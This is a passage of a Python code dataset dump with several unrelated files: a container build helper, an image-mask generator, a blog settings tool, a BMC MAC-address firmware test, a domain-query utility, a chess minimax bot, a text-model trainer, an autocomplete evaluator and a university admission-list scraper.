os.path.abspath(os.path.expanduser(options.options.portage_dir)),\n [os.path.abspath(p) for p in options.options.overlay_dir])\n\n options.log.info(\"created container \" + container.cid)\n if options.options.manual:\n container.shell()\n else:\n container.execute(\"echo emerge --ask --autounmask-write=n --verbose \" +\n \" \".join(options.options.atom) +\n \" >> ~/.bash_history\")\n try:\n container.execute(\"emerge --autounmask-write=n --verbose \" +\n \" \".join(options.options.atom))\n except Exception:\n options.log.warn(\"ignoring failure of command\")\n container.execute(\"etc-update --automode -5\")\n try:\n container.execute(\"emerge --verbose \" +\n \" \".join(options.options.atom))\n except Exception:\n options.log.warn(\"ignoring failure of command\")\n container.shell()\n","sub_path":"ebuildtester/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7093266","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nfrom tqdm import tqdm\r\nimport argparse\r\nimport json\r\n# testfiles = ['Liu100.jpg', 'Liu72.jpg', 'Liu104.jpg', 'Liu103.jpg', 'Liu88.jpg', 'Liu20.jpg', 'Liu123.jpg', 'Liu153.jpg', 'Liu163.jpg', 'Liu50.jpg', 'Liu1.jpg', 'Liu47.jpg', 'Liu37.jpg', 'Liu105.jpg', 'Liu6.jpg', 'Liu121.jpg', 'Liu149.png', 'Liu35.jpg', 'Liu56.jpg', 'Liu51.jpg', 'Liu61.jpg', 'Liu127.jpg', 'Liu160.jpg', 'Liu114.jpg', 'Liu8.jpg', 'Liu131.jpg']\r\n\r\nbounding_boxes = dict()\r\nwith open('F:/Invisible Man/new_mask_labels.json', 'r') as f:\r\n mask_labels = json.load(f)\r\n\r\nmask_labels_pbar = tqdm(mask_labels)\r\nfor row in mask_labels_pbar:\r\n img_name = row['External ID']\r\n dataset_name = row['Dataset Name']\r\n if dataset_name == 'Liu_Bolin_Studio':\r\n mask_labels_pbar.set_description(\"Processing %s\" % img_name)\r\n if 'objects' in row['Label'].keys():\r\n mask_coords_dicts = row['Label']['objects'][0]['polygon']\r\n original_img_color = cv2.imread('F:/Invisible Man/Images/Liu_Bolin_Studio/'+img_name)\r\n original_img = cv2.imread('F:/Invisible Man/Images/Liu_Bolin_Studio/'+img_name, 0)\r\n bg = np.zeros_like(original_img).astype(np.float32)\r\n mask_coords = []\r\n for mask_coords_dict in mask_coords_dicts:\r\n mask_coords.append([mask_coords_dict['x'], mask_coords_dict['y']])\r\n contour = np.array(mask_coords, dtype=np.int32)\r\n # break\r\n bbox = cv2.boundingRect(contour)\r\n bounding_boxes[img_name] = bbox\r\n mask = cv2.fillPoly(bg, pts=[contour], color=255)\r\n mask = cv2.rectangle(mask, (bbox[0], bbox[1]), (bbox[0]+bbox[2], bbox[1]+bbox[3]), 255, 3)\r\n cv2.imwrite('bounding_boxes/'+img_name, mask)\r\n # cv2.imwrite('Images/Studio_Filtered/'+img_name, original_img_color)\r\n\r\n\r\nwith open('mask_bounding_box.json', 'w') as fp:\r\n json.dump(bounding_boxes, fp)\r\n","sub_path":"LBP Classification+YOLOFace+PPD/mask_bounding_box_generator.py","file_name":"mask_bounding_box_generator.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"94978900","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport os\nimport time\n\nfrom common import whiptail, file\n\ndialog = whiptail.Whiptail()\ndialog.height = 15\ndialog.title = \"SilverBlog settings tool\"\nsystem_config = {\n \"Project_Name\": \"\",\n \"Project_Description\": \"\",\n \"Project_URL\": \"\",\n \"Author_Image\": \"\",\n \"Author_Name\": \"\",\n \"Author_Introduction\": \"\",\n 
\"Theme\": \"\",\n \"API_Password\": \"\",\n \"Paging\": 10,\n \"Time_Format\": \"%Y-%m-%d\",\n \"Rss_Full_Content\": True,\n \"Editor\": \"nano\",\n \"i18n\": \"en-US\"\n}\nif os.path.exists(\"./config/system.json\"):\n system_config = json.loads(file.read_file(\"./config/system.json\"))\n\ndef setting_menu():\n while True:\n menu_list = [\"Use the Setup Wizard\", \"Set up basic information\", \"Set up author information\",\n \"Theme package manager\", \"Other settings\",\n \"Exit\"]\n result = dialog.menu(\"Please select an action\", menu_list)\n if result == \"Exit\":\n exit(0)\n if result == \"Use the Setup Wizard\":\n setup_wizard()\n exit(0)\n if result == \"Set up basic information\":\n project_info()\n if result == \"Set up author information\":\n author_info()\n if result == \"Theme package manager\":\n theme_manage()\n if result == \"Other settings\":\n other_info()\n save_config()\n time.sleep(0.5)\ndef save_config():\n file.write_file(\"./config/system.json\", json.dumps(system_config, indent=4, sort_keys=False, ensure_ascii=False))\n\ndef theme_manage():\n from manage import theme\n dialog.title = \"Theme package manager\"\n menu_list = [\"Install the theme\", \"Use the existing theme\", \"Upgrade existing Theme\",\n \"Uninstall existing Theme\"]\n result = dialog.menu(\"Please select an action\", menu_list)\n theme_name = \"\"\n org_list = None\n if result == \"Install the theme\":\n install_menu = [\"View list\", \"Enter the theme package name\"]\n result = dialog.menu(\"Please select an action\", install_menu)\n if result == \"View list\":\n org_list = theme.get_orgs_list()\n item_list = list()\n for item in org_list:\n item_list.append(item[\"name\"])\n theme_name = dialog.menu(\"Please select the theme you want to install:\", item_list)\n if result == \"Enter the theme package name\":\n theme_name = dialog.prompt(\"Please enter the theme package name:\")\n if len(theme_name) != 0:\n theme_name = theme.install_theme(theme_name, org_list)\n if dialog.confirm(\"Do you want to enable this theme now?\", \"no\"):\n system_config[\"Theme\"] = theme_name\n if os.path.exists(\"./templates/{}/i18n\".format(theme_name)):\n system_config[\"i18n\"] = setting_i18n(theme_name)\n return\n directories = theme.get_local_theme_list()\n theme_name = dialog.menu(\"Please select the theme to be operated:\", directories)\n if result == \"Use the existing theme\":\n system_config[\"Theme\"] = theme_name\n if os.path.exists(\"./templates/{}/i18n\".format(theme_name)):\n system_config[\"i18n\"] = setting_i18n(theme_name)\n if result == \"Upgrade existing Theme\":\n theme.upgrade_theme(theme_name)\n if result == \"Uninstall existing Theme\":\n theme.remove_theme(theme_name)\n\n\ndef setting_i18n(theme_name):\n dir_list = os.listdir(\"./templates/{0}/i18n\".format(theme_name))\n show_list = list()\n for item in dir_list:\n if item.endswith(\".json\"):\n show_list.append(item.replace(\".json\", \"\"))\n return dialog.menu(\"Please select the i18n to be operated:\", show_list)\n\ndef setup_wizard():\n project_info()\n author_info()\n other_info()\n if system_config[\"Theme\"] == \"\":\n from manage import theme\n local_theme_list = theme.get_local_theme_list()\n if len(local_theme_list) != 0:\n system_config[\"Theme\"] = dialog.menu(\"Please select the theme to be operated:\", local_theme_list)\n return\n org_list = theme.get_orgs_list()\n item_list = list()\n for item in org_list:\n item_list.append(item[\"name\"])\n theme_name = dialog.menu(\"Please select the theme you want to install:\", 
item_list)\n system_config[\"Theme\"] = theme.install_theme(theme_name, org_list)\n save_config()\n\ndef show_prompt(items):\n for item in items:\n system_config[item[\"name\"]] = dialog.prompt(\"Please enter the {}:\".format(item[\"info\"]),\n system_config[item[\"name\"]])\n\ndef project_info():\n items = [{\"name\": \"Project_Name\", \"info\": \"blog name\"}, {\"name\": \"Project_Description\", \"info\": \"blog description\"},\n {\"name\": \"Project_URL\", \"info\": \"blog access URL\"}]\n show_prompt(items)\n new_password = dialog.prompt(\"Please enter the remote management tool password:\", system_config[\"API_Password\"],\n True)\n if len(new_password) != 0:\n import hashlib\n system_config[\"API_Password\"] = json.dumps(\n {\"hash_password\": hashlib.md5(new_password.encode('utf-8')).hexdigest()})\n\ndef author_info():\n items = [{\"name\": \"Author_Name\", \"info\": \"author name\"},\n {\"name\": \"Author_Introduction\", \"info\": \"author introduction\"}]\n show_prompt(items)\n if dialog.confirm(\"Use Gravatar?\", \"no\"):\n from manage import get\n system_config[\"Author_Image\"] = get.get_gravatar(system_config[\"Author_Name\"])\n return\n system_config[\"Author_Image\"] = dialog.prompt(\"Please enter the author image:\", system_config[\"Author_Image\"])\n\ndef other_info():\n system_config[\"Paging\"] = int(dialog.prompt(\"Please enter the paging:\", str(system_config[\"Paging\"])))\n items = [{\"name\": \"Time_Format\", \"info\": \"time format\"},\n {\"name\": \"Editor\", \"info\": \"editor\"}]\n show_prompt(items)\n system_config[\"Rss_Full_Content\"] = dialog.confirm(\"Output full text Rss?\", \"yes\")\n","sub_path":"manage/setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":6041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"254412627","text":"from case.CBaseCase import *\n\nclass T2786_bmc_NonVolatileBMCMACAddr(CBaseCase):\n '''\n **************************************************************\n [Purpose ]: Verify that the BMC MAC address is stored in an area \n of non-volatile memory and it will not be erased in \n the course of FW image update except uboot FW update. \n [Author ]: Forrest.Gu@emc.com\n [Sprint ]: ATOM W32\n [Tickets ]: ATOM-1897\n [Platform]: All\n [Type ]: Auto\n [History ]:\n - Forrest.Gu@emc.com 08/07/2014\n First edition.\n **************************************************************\n '''\n def __init__(self):\n CBaseCase.__init__(self, self.__class__.__name__)\n \n def config(self):\n CBaseCase.config(self)\n # To do: Case specific config\n \n def test(self):\n \n _bmc = self.enclosure.sp.bmc\n _fw = self.enclosure.sp.firmware\n _sp = self.enclosure.sp\n \n # 1. Prepare data of IP source, IP, netmask and MAC address\n orig_list_mac = _bmc.get_mac()\n orig_int_ip_source = _bmc.get_lan_ip_source()\n orig_list_ip = _bmc.get_lan_ip_address()\n orig_list_netmask = _bmc.get_lan_netmask()\n \n # 2. 
Set MAC address to a new one and verify\n self.log('INFO', 'Set MAC address and verify it is set as expected')\n new_list_mac = orig_list_mac[:]\n new_list_mac[-1] += 5\n new_list_mac[-1] %= 256\n _bmc.set_mac(new_list_mac)\n time.sleep(10)\n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After set MAC address, expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after set MAC address')\n time.sleep(10)\n \n # 3. Reset non-volatile data and verify\n self.log('INFO', 'Reset all non-volatile data then verify MAC address is not changed')\n _sp.non_volatile_data_reset(0x01)\n _sp.reset_fw_upgrade_after_nv_data_recover()\n _sp.uart_set_mux(0x03, ['kcs'])\n \n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After reset non-volatile data and firmware upgrade reset,\\\n BMC MAC address is unexpectedly changed. Expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after reset non-volatile data')\n time.sleep(10)\n \n # 4. Reset BMC and verify\n self.log('INFO', 'Cold reset BMC then verify MAC address is not changed')\n _sp.reset_bmc_cold_reset()\n \n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After BMC cold reset,\\\n BMC MAC address is unexpectedly changed. Expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after BMC cold reset')\n time.sleep(10)\n \n # 5. Cold reset BMC and host then verify\n self.log('INFO', 'Cold reset BMC and host then verify MAC address is not changed')\n _sp.reset_bmc_cold_reset_host_cold_reset()\n _sp.go_to_host_os()\n \n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After BMC and host cold reset,\\\n BMC MAC address is unexpectedly changed. Expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after BMC and host cold reset')\n time.sleep(10)\n \n # 6. Update BMC then verify\n self.log('INFO', 'Update BMC main partition then verify MAC address is not changed')\n self._update_bmc()\n \n got_list_mac = _bmc.get_mac(['kcs', 'console'])\n if got_list_mac != new_list_mac:\n raise Exception('FAIL', 'After update BMC main partition,\\\n BMC MAC address is unexpectedly changed. Expected MAC is [%s], actual MAC is [%s]'\\\n % (' '.join(hex(i) for i in new_list_mac), ' '.join(hex(i) for i in got_list_mac)))\n self.log('INFO', 'MAC address is verified expected after BMC main partition update')\n time.sleep(10)\n \n # 7. 
Reset MAC address, IP source, IP and netmask\n self.log('INFO', 'Recover BMC MAC address')\n _bmc.set_mac(orig_list_mac)\n self.log('INFO', 'Recover BMC MAC address done')\n \n self.log('INFO', 'Recover IP source')\n _bmc.set_lan_ip_source(orig_int_ip_source)\n self.log('INFO', 'Recover IP source done')\n \n if orig_int_ip_source == 0x01:\n self.log('INFO', 'Recover IP address')\n _bmc.set_lan_ip_address(orig_list_ip)\n self.log('INFO', 'Recover BMC MAC address done')\n \n self.log('INFO', 'Recover net mask')\n _bmc.set_lan_netmask(orig_list_netmask)\n self.log('INFO', 'Recover BMC MAC address done')\n \n self.log('INFO', 'Wait 10s and BMC lan should work...')\n time.sleep(10)\n list_version = _bmc.get_device_id(['iol'])\n self.log('INFO', 'Get device ID via IOL success, BMC version: %d.%d' % (list_version[0], list_version[1]))\n \n def deconfig(self):\n # To do: Case specific deconfig\n CBaseCase.deconfig(self)\n\n def _update_bmc(self):\n \n # Get BMC image\n self.log('INFO', 'Get BMC image from release folder...')\n obj_bmc_bin = self.obj_release.get_image_by_type('bmc_main')\n if obj_bmc_bin == None:\n self.result(FAIL, 'BMC image is not found.')\n return\n \n # Record firmware version\n str_version = obj_bmc_bin.version()\n list_version = [int(str_version[0:2], 0), int(str_version[2:], 0)]\n \n # Copy BMC to TFTP root\n str_tftp_root_folder = Env.obj_tftp_server.root_folder() \n \n # Forrest: should consider file locker here. But fail to find proper option\n if obj_bmc_bin.str_file_name in os.listdir(str_tftp_root_folder):\n self.log('INFO', 'BMC image %s is already in TFTP root folder' % obj_bmc_bin.str_file_name)\n else:\n self.log('INFO', 'BMC image %s is not in TFTP root folder, copying...' % obj_bmc_bin.str_file_name)\n if obj_bmc_bin.copy_to(str_tftp_root_folder):\n self.log('INFO', 'Copy done.')\n else:\n self.result(FAIL, 'Fail to copy BMC image %s to TFTP root folder' % obj_bmc_bin.str_file_name)\n \n # Get file size\n int_bmc_size = os.path.getsize('%s\\\\%s' % (str_tftp_root_folder, obj_bmc_bin.str_file_name))\n int_bmc_size_mb = int(math.ceil(float(int_bmc_size)/1024/1024))\n \n _firmware = self.enclosure.sp.firmware\n \n # Check firmware upgrade status before init\n list_status = _firmware.new_get_firmware_update_status()\n int_status = byte_in_response(list_status, 1)\n if int_status != 0x00:\n raise Exception('Fimrware update status should be 0x00(idle) before init, but it is 0x%X now' % int_status)\n else:\n self.log('INFO', 'Firmware update status is idle')\n \n # Initiate firmware upgrade\n _firmware.new_init_firmware_update(0x02, int_bmc_size_mb)\n \n # Check firmware upgrade status after init\n list_status = _firmware.new_get_firmware_update_status()\n int_status = byte_in_response(list_status, 1)\n if int_status != 0x02:\n raise Exception('Fimrware update status should be 0x02(Ready for image transfer) after init, but it is 0x%X now' % int_status)\n else:\n self.log('INFO', 'Firmware update status is ready for image transfer after initialization')\n \n # Set target device\n _firmware.new_set_target_device('BMC Main SPI Partition')\n \n # Check firmware upgrade status after set target device\n list_status = _firmware.new_get_firmware_update_status()\n int_status = byte_in_response(list_status, 1)\n if int_status != 0x02:\n raise Exception('Fimrware update status should be 0x02(Ready for image transfer) before image transfer, but it is 0x%X now' % int_status)\n else:\n self.log('INFO', 'Firmware update status is still ready for image transfer after set target update 
device')\n \n # Set remote image path\n str_ip = Env.obj_tftp_server.ip()\n list_ip = map(lambda a:int(a,0), str_ip.split('.'))\n _firmware.new_set_remote_image_path(list_ip, obj_bmc_bin.str_file_name)\n \n \n # Check firmware upgrade status after set remote image path\n list_status = _firmware.new_get_firmware_update_status()\n int_status = byte_in_response(list_status, 1)\n if int_status != 0x02:\n raise Exception('Fimrware update status should be 0x02(Ready for image transfer) before image transfer, but it is 0x%X now' % int_status)\n else:\n self.log('INFO', 'Firmware update status is still ready for image transfer after set remote image path')\n \n # Transfer image\n _firmware.new_transfer_image()\n \n # Wait until complete\n _firmware.new_wait_until_transfer_complete()\n \n self.enclosure.sp.sel.start_reserve_sel_in_memory()\n \n # Flash image\n _firmware.new_flash_image()\n \n # Wait until complete\n _firmware.new_wait_until_flash_complete()\n \n if self.enclosure.sp.sel.check_matched_sel_from_memory(\\\n str_generator_id = '0x20', \\\n str_sensor_type = '0xC2', \\\n str_sensor_num = '0xE2', \\\n str_event_type = '0x6F', \\\n lst_event_data_and_mask = ['0xA0', '0xff', '0x00', '0xff', '0x10', '0xff']) != 0:\n raise Exception('FAIL', 'Fail to catch firmware upgrade complete SEL.')\n else:\n self.log('INFO', 'Firmware upgrade complete SEL is verified.')\n self.enclosure.sp.sel.stop_reserve_sel_in_memory()\n \n time.sleep(10)\n # Firmware upgrade reset\n self.enclosure.sp.reset_firmware_upgrade_reset()\n \n # Get BMC version\n list_updated_version = self.enclosure.sp.bmc.get_device_id()\n \n if list_version == list_updated_version:\n self.log('INFO', 'BMC version is verified after update. Version: %d.%d'\\\n % (list_version[0], list_version[1]))\n else:\n raise Exception('FAIL', 'Expected BMC version is %d.%d, actual version is %d.%d'\\\n % (list_version[0], list_version[1], list_updated_version[0], list_updated_version[1]))\n","sub_path":"case/develop/T2786_bmc_NonVolatileBMCMACAddr.py","file_name":"T2786_bmc_NonVolatileBMCMACAddr.py","file_ext":"py","file_size_in_byte":11378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"367710964","text":"from datetime import datetime, date, timedelta\n\nfrom django.shortcuts import render\nfrom django.db import connections\nfrom django.http import HttpResponse, JsonResponse\n\nfrom apps.spiders.models import SpiderBase, TLD, ExtraWord2Query\nfrom .ahrefs_api import ahrefs_api\nfrom .models import LogRequests\n\n\nclass Spider(SpiderBase):\n class Meta(SpiderBase.Meta):\n db_table = 'domains'\n\n\nclass UpdateAhrefs(object):\n \"\"\"\n only_show - parameter for analytic command\n \"\"\"\n\n def __init__(self, tld=False, limit=2, only_show=False, only_count=False):\n self.spider = Spider\n self.tld = tld\n self.limit = limit\n self.only_show = only_show\n self.only_count = only_count\n\n def get_domains4ahrefs(self):\n \"\"\"\n Select domain for checking Ahrefs data\n Additional constraints specified in ExtraWord2Query\n \"\"\"\n result = {}\n default_query = '''SELECT domain FROM domains WHERE use_level = 1\n AND ahrefs_checks_at IS NULL\n AND (http_status_code != 200 \n OR title IS NULL \n OR length(title) < 3\n OR title ILIKE '%Suspended%'\n OR title ILIKE '%Not found%'\n OR title ILIKE '%Empty%'\n OR title ILIKE '%Incorrect%'\n OR title ILIKE '%Timeout%'\n OR title ILIKE '%Construction%'\n OR title ILIKE '%index%'\n OR title ILIKE '%nginx%'\n OR title ILIKE '%TooManyRedirects%'\n OR title 
ILIKE '%ConnectionError%'\n OR title ILIKE '%default%'\n OR title ILIKE '%redirect%'\n OR title ILIKE '%Untitled%'\n OR title ILIKE '%Error%'\n OR title ILIKE '%DOCTYPE%' )'''\n if self.tld:\n tld = TLD.objects.get(tld_end=self.tld)\n result = self.get_tld_domains(tld, default_query)\n else:\n # Get all tld\n tlds = TLD.objects.filter(is_active=True)\n for tld in tlds:\n result = self.get_tld_domains(tld, default_query)\n\n if self.only_show:\n print(f\"Domains: {result}\")\n\n if self.only_show:\n return f\"FINISH: {datetime.now()}\"\n\n return result\n\n def get_tld_domains(self, tld, default_query):\n tld_query = ''\n words = ExtraWord2Query.objects.filter(tld=tld)\n for word in words:\n tld_query = default_query[:-1] + \\\n \"OR title ILIKE '%{}%' )\".format(word.like_word)\n\n if not self.only_count:\n tld_query += f' LIMIT {self.limit}'\n\n # print(f'default_query: {tld_query}')\n print(f'TLD: {tld.db_name()}')\n # Do request\n with connections[tld.db_name()].cursor() as cursor:\n cursor.execute(tld_query)\n rows = cursor.fetchall()\n rows_cnt = len(rows)\n\n if self.only_count:\n print(f\"Count:{rows_cnt}\")\n return f\"FINISH: {datetime.now()}\"\n\n if rows_cnt:\n lst = set(row[0] for row in rows)\n return lst\n else:\n print('No data from DB')\n return\n\n raise ValueError('No connection to DB')\n\n def write_data2db(self, domains_data):\n for domain, data in domains_data.items():\n # print(domain)\n tld = domain.split('.')[1]\n self.spider.objects.using(f'db_{tld}').filter(domain=domain).update(**data)\n\n @staticmethod\n def log_requests_ahrefs(self, domains):\n cnt_domains = len(domains) if domains else 0\n hash_domains = hash(str(domains)) if domains else 0\n print(f\"log_requests_ahrefs: {cnt_domains}: {hash_domains}\")\n LogRequests.objects.create(tld=self.tld, cnt_domains=cnt_domains,\n hash=hash_domains)\n\n def update_ahrefs_data(self):\n domains = set()\n domains = self.get_domains4ahrefs()\n self.log_requests_ahrefs(domains)\n\n # if domains:\n # print(f'domains: {domains}')\n # domains_data = ahrefs_api(domains)\n # # print(f'domains_data: {domains_data}')\n # self.write_data2db(domains_data)\n # return domains\n # return\n","sub_path":"apps/ahrefs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"241355692","text":"import chess\n\ndef minimax(board, depth, maximize):\n if board.is_checkmate():\n return -40 if maximize else 40\n elif board.is_game_over():\n return 0\n\n if depth == 0:\n return boardValue(board)\n\n if maximize:\n bestValue = float(\"-inf\")\n for move in board.legal_moves:\n experimentBoard = board.copy()\n experimentBoard.push(move)\n value = minimax(experimentBoard, depth, False)\n bestValue = max(bestValue, value)\n return bestValue\n else:\n bestValue = float(\"inf\")\n for move in board.legal_moves:\n experimentBoard = board.copy()\n experimentBoard.push(move)\n value = minimax(experimentBoard, depth - 1, True)\n bestValue = min(bestValue, value)\n return bestValue\n\n return 0\n\ndef boardValue(board):\n boardString = board.fen().split()[0]\n pawnDiff = boardString.count(\"P\") - boardString.count(\"p\")\n rookDiff = boardString.count(\"R\") - boardString.count(\"r\")\n knightDiff = boardString.count(\"N\") - boardString.count(\"n\")\n bishopDiff = boardString.count(\"B\") - boardString.count(\"b\")\n queenDiff = boardString.count(\"Q\") - boardString.count(\"q\")\n\n return 1*pawnDiff + 3*bishopDiff + 3*knightDiff + 
5*rookDiff + 9*queenDiff\n\nif __name__ == \"__main__\":\n gameBoard = chess.Board()\n\n while True:\n\n print(gameBoard)\n print(gameBoard.legal_moves)\n userMove = raw_input(\"Enter the move you want to make: \")\n gameBoard.push_san(userMove)\n\n if gameBoard.is_checkmate():\n print(gameBoard)\n print(\"User wins!\")\n break\n elif gameBoard.is_game_over():\n print(gameBoard)\n print(\"Tie game\")\n break\n\n minValue = float(\"inf\")\n minMove = None\n for move in gameBoard.legal_moves:\n experimentBoard = gameBoard.copy()\n experimentBoard.push(move)\n value = minimax(experimentBoard, 2, False)\n\n if value < minValue:\n minValue = value\n minMove = move\n\n gameBoard.push(minMove)\n if gameBoard.is_checkmate():\n print(gameBoard)\n print(\"Computer wins\")\n break\n elif gameBoard.is_game_over():\n print(gameBoard)\n print(\"Tie game\")\n break\n","sub_path":"Minimax.py","file_name":"Minimax.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"152671718","text":"import sys\nimport argparse\nimport os\nimport collections\n\n\ndef create_parser():\n \"\"\"Create command line parser.\n\n Create parser what can process all arguments.\n Input directory\n It's path to input directory, the files in this directory\n will be used for making model.\n Model file name\n It's name of model file, in this file will been writen the model.\n Convert to lowercase\n If user wants to convert all words to lowercase.\n :return parser: Parser with parameters.\n \"\"\"\n parser = argparse.ArgumentParser(\n prog=\"Script for collecting statistics to generation new text.\",\n description='''This program collects statistic on the source\n texts.''',\n epilog='''(c) March 2018, Kalmykov V.K.'''\n )\n parser.add_argument('--input-dir', help=\"Path to source directory\",\n type=str)\n parser.add_argument('--model', help='Path to result directory',\n type=str)\n parser.add_argument('--lc', action='store_true',\n help='Save texts in lowercase.')\n return parser\n\n\ndef get_filelist(input_directory):\n \"\"\"\n Get list of source files.\n\n Get list of source files(according to command line arguments).\n If there isn't input directory, filelist will contain only stdin.\n In another case filelist will contain all open files from filenames.\n :param input_directory: Input directory.\n :return filelist: List of source files.\n \"\"\"\n filelist = list()\n filelist.append(sys.stdin)\n if input_directory:\n filenames = os.listdir(input_directory)\n filelist.clear()\n for filename in filenames:\n filelist.append(open(input_directory + filename, \"r\"))\n return filelist\n\n\ndef prepare_line(line, is_lower):\n \"\"\"\n Prepare one line for appending into model.\n\n This function takes all words from line.\n :param line: Line of source text.\n :param commands: Command line arguments.\n :return: List of words in this line.\n \"\"\"\n good_line = \\\n ''.join(list(map(lambda c: c if c.isalpha() else ' ', line))).split()\n if is_lower:\n good_line = good_line.lower()\n return list(good_line.split())\n\n\ndef write_model(model, result_file):\n \"\"\"\n Write model.\n\n Write model to file in this format:\n In one line first word is the first word of pair, and then there is list of\n word-number_of_this_word.\n :param model: Model to write.\n :param result_file: Output file(ot stdout).\n :return: None.\n \"\"\"\n for first_word in model.keys():\n line = first_word\n for word, counter in model[first_word].items():\n line += ' ' + 
word + ' ' + str(counter)\n result_file.write(line + '\\n')\n\n\ndef add_pair(first_word, second_word, model):\n \"\"\"\n Add pair of words.\n\n Add pair of connected words in model of text.\n :param first_word: First word.\n :param second_word: Second word.\n :param model: Model of text.\n \"\"\"\n model.setdefault(first_word, collections.Counter())\n model[first_word][second_word] += 1\n\n\ndef run(args):\n \"\"\"\n Run program.\n\n Main function that run all program.\n 1. Creating parser of command line arguments.\n 2. Reading list of files.\n 3. Reading all files.\n 4. Writing model to file.\n :param args: Command line arguments.\n \"\"\"\n parser = create_parser()\n commands = parser.parse_args(args)\n result_file = open(commands.model, \"w\")\n list_of_files = get_filelist(commands.input_dir)\n model = dict()\n for file in list_of_files:\n line = file.readline()\n prev_word = None\n while line != \"\":\n word_list = prepare_line(line, commands.lc)\n for word in word_list:\n if prev_word:\n add_pair(prev_word, word, model)\n prev_word = word\n line = file.readline()\n file.close()\n write_model(model, result_file)\n\n\nif __name__ == \"__main__\":\n run(sys.argv[1:])\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"127382261","text":"\nimport numpy as np\nimport tensorflow as tf\nfrom tqdm import tqdm\n\nfrom python.dataset import AutoComplete\nfrom python.model import PureNLSTM\nfrom python.summary import ContextAccuracy\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\ntrain_dataset = AutoComplete(repeat=True, batch_size=64)\ntest_dataset = AutoComplete(dataset='test', repeat=False, batch_size=16)\nmodel = PureNLSTM(train_dataset, name='autocomplete_nlstm_600',\n embedding_size=600,\n verbose=True)\n\ncontext_accuracy = ContextAccuracy()\n\nfor output_i, output in enumerate(\n tqdm(model.predict(dataset=test_dataset), total=test_dataset.observations)\n):\n probabilities = output['probabilities']\n predict_sorted = np.argsort(probabilities, axis=1)[:, ::-1]\n\n source = test_dataset.decode_source(output['source'])\n target = test_dataset.decode_target(output['target'])\n predict = test_dataset.decode_target(predict_sorted)\n\n context_accuracy.add(source, predict, target)\n\nprint(context_accuracy.summary())\n","sub_path":"python/run/autocomplete_pure_nlstm_quantitative.py","file_name":"autocomplete_pure_nlstm_quantitative.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"578142908","text":"#!/usr/bin/env python3\r\nimport requests\r\nimport lxml\r\nfrom bs4 import BeautifulSoup\r\n\r\nname = 'Салтыков Андрей Юрьевич' # Ф.И.О.\r\namount_of_bills = '264' # Колличество баллов\r\nspecialty_number = 3 # Желательно ввести, поскольку при выборе порядок может поменяться. 
Номер специальности в списке на сайте ВятГУ\r\ntype_of_education = 1 # Бюджетные места: 1, Места с оплатой стоимости обучения: 2\r\n\r\ndef place_in_the_list(url, name, amount_of_bills):\r\n\r\n try:\r\n data = list(map(lambda x: list(map(lambda y: y.get_text(), x.find_all('td')[:3])), BeautifulSoup(requests.get(url).text, 'lxml').find_all('table')[-1].find_all('tr')[1:]))\r\n except:\r\n return 'Списка не существует'\r\n\r\n for i in data:\r\n if i[1] == name and i[2] == amount_of_bills:\r\n return i[0]\r\n return 'Нет в списке'\r\n\r\n\r\nstart_list_url = 'https://www.vyatsu.ru/php/pk/'\r\n\r\nwith open('specialty-list.txt', 'r', encoding=\"utf8\") as f:\r\n specialty_list = f.read()\r\nspecialty_list = BeautifulSoup(specialty_list, 'lxml')\r\nspecialty_list = list(map(lambda x: x.find_all('td'), specialty_list.find_all('tr')))\r\n\r\nif not specialty_number: \r\n print('Выберите направление:')\r\n for i in specialty_list:\r\n print(i[0].get_text() + '.', i[1].get_text()[9:])\r\n specialty_number = int(input())\r\n\r\nif not type_of_education and specialty_number not in [7, 36, 43, 45, 66]:\r\n print('Вид обучения:')\r\n print('1. Бюджет')\r\n print('2. С оплатой стоимости обучения')\r\n type_of_education = int(input())\r\nelif type_of_education == None:\r\n type_of_education = 2\r\n\r\nspecialty_urls_list = list(map(lambda x: list(map(lambda y: y.find('a').get('href') if y.find('a') != None else None, x[2:])), specialty_list))\r\n\r\nif type_of_education == 1:\r\n reception_tables_url = list(map(lambda x: start_list_url + x, specialty_urls_list[specialty_number - 1][:3]))\r\nelse:\r\n reception_tables_url = list(map(lambda x: start_list_url + x, 